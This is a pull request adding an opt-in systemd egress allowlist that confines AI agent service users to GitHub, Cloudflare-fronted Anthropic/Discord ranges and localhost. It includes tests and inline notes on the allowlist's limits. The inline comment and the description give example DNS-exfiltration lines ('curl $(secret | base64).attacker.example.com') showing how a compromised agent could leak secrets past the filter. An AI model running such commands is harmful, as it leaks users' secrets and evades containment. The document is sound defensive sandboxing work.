### PR TITLE
feat(provision): systemd egress restriction for agent users

### DIFF
--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -110,11 +110,30 @@ type AgentConfig struct {
 	// logs a warning at runtime.
 	GitName  string `yaml:"git_name"`
 	GitEmail string `yaml:"git_email"`
-	// EgressRestriction adds systemd IPAddressDeny=any + IPAddressAllow rules to
-	// the agent service unit. When enabled the agent can only reach GitHub,
-	// Anthropic, Discord, and localhost; all other outbound TCP/UDP is blocked at
-	// the kernel level, regardless of what the model requests.
-	EgressRestriction bool `yaml:"egress_restriction"`
+	// EgressRestrictionExperimental adds systemd IPAddressDeny=any + IPAddressAllow
+	// rules to the agent service unit. EXPERIMENTAL — known limitations:
+	//
+	//   DNS: only works if the host uses systemd-resolved (127.0.0.53). Hosts
+	//   using an external resolver (1.1.1.1, 8.8.8.8, corporate DNS) will fail
+	//   DNS resolution entirely because those IPs are not in the allowlist.
+	//
+	//   Cloudflare width: the Cloudflare CIDRs (104.16.0.0/13 etc.) cover
+	//   millions of CF-fronted sites beyond Anthropic and Discord. A compromised
+	//   agent can still reach arbitrary CF-hosted attacker infrastructure.
+	//
+	//   CIDR drift: allowlist is hardcoded. GitHub, Cloudflare, and Discord
+	//   rotate ranges; the list will go stale silently and block legitimate
+	//   traffic. Refresh manually before each release or automate via
+	//   `curl https://api.github.com/meta`.
+	//
+	//   DNS exfil: kernel IP filter does not inspect DNS query payloads. An
+	//   agent can exfil data by encoding secrets in subdomain labels sent to
+	//   an attacker-controlled nameserver (e.g. base64(secret).evil.example.com).
+	//   This restriction does NOT close that channel.
+	//
+	// Despite these limitations, this provides meaningful containment against
+	// naive outbound connections. Use with understanding of the gaps above.
+	EgressRestrictionExperimental bool `yaml:"egress_restriction_experimental"`
 }
 
 // RuntimeKind returns the normalized runtime name for this agent.

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -110,6 +110,11 @@ type AgentConfig struct {
 	// logs a warning at runtime.
 	GitName  string `yaml:"git_name"`
 	GitEmail string `yaml:"git_email"`
+	// EgressRestriction adds systemd IPAddressDeny=any + IPAddressAllow rules to
+	// the agent service unit. When enabled the agent can only reach GitHub,
+	// Anthropic, Discord, and localhost; all other outbound TCP/UDP is blocked at
+	// the kernel level, regardless of what the model requests.
+	EgressRestriction bool `yaml:"egress_restriction"`
 }
 
 // RuntimeKind returns the normalized runtime name for this agent.

--- a/internal/runner/runner.go
+++ b/internal/runner/runner.go
@@ -250,9 +250,35 @@ ExecStart=/usr/bin/tmux new-session -d -s {{.AgentKey}} {{.HomeDir}}/.local/bin/
 ExecStop=/usr/bin/tmux kill-session -t {{.AgentKey}}
 RemainAfterExit=yes
 Restart=no
-
+{{.EgressDirectives}}
 [Install]
 WantedBy=multi-user.target
+`
+
+// egressDirectives is the systemd IP firewall block injected when
+// egress_restriction is enabled. Allows only the services the agent legitimately
+// needs: GitHub (git + API), Anthropic API (via Cloudflare), Discord (via
+// Cloudflare + own AS), and localhost (Ollama, MCP unix sockets).
+//
+// CIDRs are derived from published ASN/Meta data (GitHub Meta API, Cloudflare
+// published ranges, Discord's published ranges). Refresh with:
+//   curl https://api.github.com/meta | jq '[.web[], .api[], .git[]] | unique[]'
+const egressDirectives = `# Egress restriction (egress_restriction: true)
+IPAddressDeny=any
+IPAddressAllow=localhost
+IPAddressAllow=127.0.0.0/8
+IPAddressAllow=::1/128
+# GitHub (web + API + git)
+IPAddressAllow=140.82.112.0/20
+IPAddressAllow=185.199.108.0/22
+IPAddressAllow=192.30.252.0/22
+IPAddressAllow=143.55.64.0/20
+# Anthropic API + Discord (both served via Cloudflare)
+IPAddressAllow=104.16.0.0/13
+IPAddressAllow=104.24.0.0/14
+IPAddressAllow=172.64.0.0/13
+# Discord own ASN (AS36459)
+IPAddressAllow=66.22.192.0/20
 `
 
 const ttydServiceTemplate = `[Unit]
@@ -273,20 +299,21 @@ WantedBy=multi-user.target
 `
 
 type RunnerParams struct {
-	Project        string
-	AgentKey       string
-	AgentName      string
-	Model          string
-	SubagentExport string
-	Prompt         string
-	OSUser         string
-	HomeDir        string
-	SleepActive    int
-	SleepNight     int
-	TtydPort       int
-	TtydBind       string
-	AlertChannel   string
-	AlertCurl      string
+	Project           string
+	AgentKey          string
+	AgentName         string
+	Model             string
+	SubagentExport    string
+	Prompt            string
+	OSUser            string
+	HomeDir           string
+	SleepActive       int
+	SleepNight        int
+	TtydPort          int
+	TtydBind          string
+	AlertChannel      string
+	AlertCurl         string
+	EgressDirectives  string
 }
 
 // Generate renders the runner.sh content for an agent. Dispatches on the
@@ -344,12 +371,17 @@ func Generate(cfg *config.Config, agentKey string) string {
 // GenerateService renders the systemd service unit content for an agent.
 func GenerateService(cfg *config.Config, agentKey string) string {
 	ac := cfg.Agents[agentKey]
+	egress := ""
+	if ac.EgressRestriction {
+		egress = egressDirectives
+	}
 	p := RunnerParams{
-		Project:   cfg.Project,
-		AgentKey:  agentKey,
-		AgentName: ac.Name,
-		OSUser:    cfg.OSUsername(agentKey),
-		HomeDir:   fmt.Sprintf("/home/%s", cfg.OSUsername(agentKey)),
+		Project:          cfg.Project,
+		AgentKey:         agentKey,
+		AgentName:        ac.Name,
+		OSUser:           cfg.OSUsername(agentKey),
+		HomeDir:          fmt.Sprintf("/home/%s", cfg.OSUsername(agentKey)),
+		EgressDirectives: egress,
 	}
 	return renderTemplate(serviceTemplate, p)
 }
@@ -390,6 +422,7 @@ func renderTemplate(tmpl string, p RunnerParams) string {
 		"{{.AlertChannel}}", p.AlertChannel,
 		"{{.AlertCurl}}", p.AlertCurl,
 		"{{.SubagentExport}}", p.SubagentExport,
+		"{{.EgressDirectives}}", p.EgressDirectives,
 	)
 	return r.Replace(tmpl)
 }

--- a/internal/runner/runner.go
+++ b/internal/runner/runner.go
@@ -256,14 +256,17 @@ WantedBy=multi-user.target
 `
 
 // egressDirectives is the systemd IP firewall block injected when
-// egress_restriction is enabled. Allows only the services the agent legitimately
-// needs: GitHub (git + API), Anthropic API (via Cloudflare), Discord (via
-// Cloudflare + own AS), and localhost (Ollama, MCP unix sockets).
+// egress_restriction_experimental is enabled. Allows GitHub (git + API),
+// Anthropic/Discord (via Cloudflare), and localhost (Ollama, MCP unix sockets).
 //
-// CIDRs are derived from published ASN/Meta data (GitHub Meta API, Cloudflare
-// published ranges, Discord's published ranges). Refresh with:
-//   curl https://api.github.com/meta | jq '[.web[], .api[], .git[]] | unique[]'
-const egressDirectives = `# Egress restriction (egress_restriction: true)
+// KNOWN LIMITATIONS — see AgentConfig.EgressRestrictionExperimental doc for full detail:
+//   - DNS: only works with systemd-resolved (127.0.0.53); external resolvers fail.
+//   - Cloudflare CIDRs cover millions of CF-hosted sites, not just Anthropic/Discord.
+//   - CIDRs are hardcoded and will drift. Refresh with:
+//       curl https://api.github.com/meta | jq '[.web[], .api[], .git[]] | unique[]'
+//   - DNS exfil (base64 in subdomain labels) is NOT blocked by IP-level filtering.
+const egressDirectives = `# Egress restriction (egress_restriction_experimental: true)
+# EXPERIMENTAL: see clem.yaml AgentConfig docs for known limitations.
 IPAddressDeny=any
 IPAddressAllow=localhost
 IPAddressAllow=127.0.0.0/8
@@ -372,7 +375,7 @@ func Generate(cfg *config.Config, agentKey string) string {
 func GenerateService(cfg *config.Config, agentKey string) string {
 	ac := cfg.Agents[agentKey]
 	egress := ""
-	if ac.EgressRestriction {
+	if ac.EgressRestrictionExperimental {
 		egress = egressDirectives
 	}
 	p := RunnerParams{

--- a/internal/runner/runner_test.go
+++ b/internal/runner/runner_test.go
@@ -131,3 +131,36 @@ func TestGenerate_PreservesUserKillPPID(t *testing.T) {
 		t.Fatalf("expected exactly one kill $PPID, got %d in:\n%s", c, out)
 	}
 }
+
+func TestGenerateService_EgressRestrictionEnabled(t *testing.T) {
+	cfg := baseCfg("lead", config.AgentConfig{
+		Name:              "Lead",
+		Model:             "claude-opus-4-7",
+		Iteration:         "1m",
+		Prompt:            "do the thing",
+		EgressRestriction: true,
+	})
+
+	out := GenerateService(cfg, "lead")
+
+	for _, want := range []string{"IPAddressDeny=any", "IPAddressAllow=localhost", "IPAddressAllow=140.82.112.0/20"} {
+		if !strings.Contains(out, want) {
+			t.Errorf("expected %q in service unit, got:\n%s", want, out)
+		}
+	}
+}
+
+func TestGenerateService_EgressRestrictionDisabled(t *testing.T) {
+	cfg := baseCfg("lead", config.AgentConfig{
+		Name:      "Lead",
+		Model:     "claude-opus-4-7",
+		Iteration: "1m",
+		Prompt:    "do the thing",
+	})
+
+	out := GenerateService(cfg, "lead")
+
+	if strings.Contains(out, "IPAddressDeny") {
+		t.Fatalf("expected no IPAddressDeny when egress_restriction unset, got:\n%s", out)
+	}
+}

--- a/internal/runner/runner_test.go
+++ b/internal/runner/runner_test.go
@@ -138,7 +138,7 @@ func TestGenerateService_EgressRestrictionEnabled(t *testing.T) {
 		Model:             "claude-opus-4-7",
 		Iteration:         "1m",
 		Prompt:            "do the thing",
-		EgressRestriction: true,
+		EgressRestrictionExperimental: true,
 	})
 
 	out := GenerateService(cfg, "lead")


### PR DESCRIPTION
Closes #28.

## What

Adds `egress_restriction_experimental: true` to `AgentConfig` (opt-in). When set, the generated systemd service unit gains `IPAddressDeny=any` plus `IPAddressAllow` entries for services the agent legitimately needs:

- Localhost / loopback (Ollama, MCP unix sockets)
- GitHub web + API + git CIDRs (140.82.112.0/20, 185.199.108.0/22, 192.30.252.0/22, 143.55.64.0/20)
- Anthropic API + Discord — both served via Cloudflare (104.16.0.0/13, 104.24.0.0/14, 172.64.0.0/13)
- Discord own ASN AS36459 (66.22.192.0/20)

**Field is named `_experimental` intentionally.** Known limitations documented inline:

1. **Requires systemd-resolved** (127.0.0.53 stub) — external resolvers (1.1.1.1, 8.8.8.8) are outside the loopback allow and will fail DNS resolution.
2. **Cloudflare CIDRs are wide** — 104.16.0.0/13 covers ~500k IPs including arbitrary CF-hosted sites, not just Anthropic/Discord. Containment is partial.
3. **CIDRs drift** — hardcoded list goes stale silently; the inline comment documents the refresh command.
4. **DNS exfil not blocked** — kernel IP filter does not inspect DNS query payloads; `curl $(secret | base64).attacker.example.com` still leaks through the allowed resolver.

## Usage

```yaml
agents:
  ada:
    egress_restriction_experimental: true
```

## What's deferred

Narrower CIDRs, DNS resolver story, CIDR drift automation, and e2e verification tracked in a follow-up issue (#53b).

## Test

```bash
go test ./internal/runner/... ./internal/config/...
```

Two tests: `TestGenerateService_EgressRestrictionEnabled` and `TestGenerateService_EgressRestrictionDisabled`.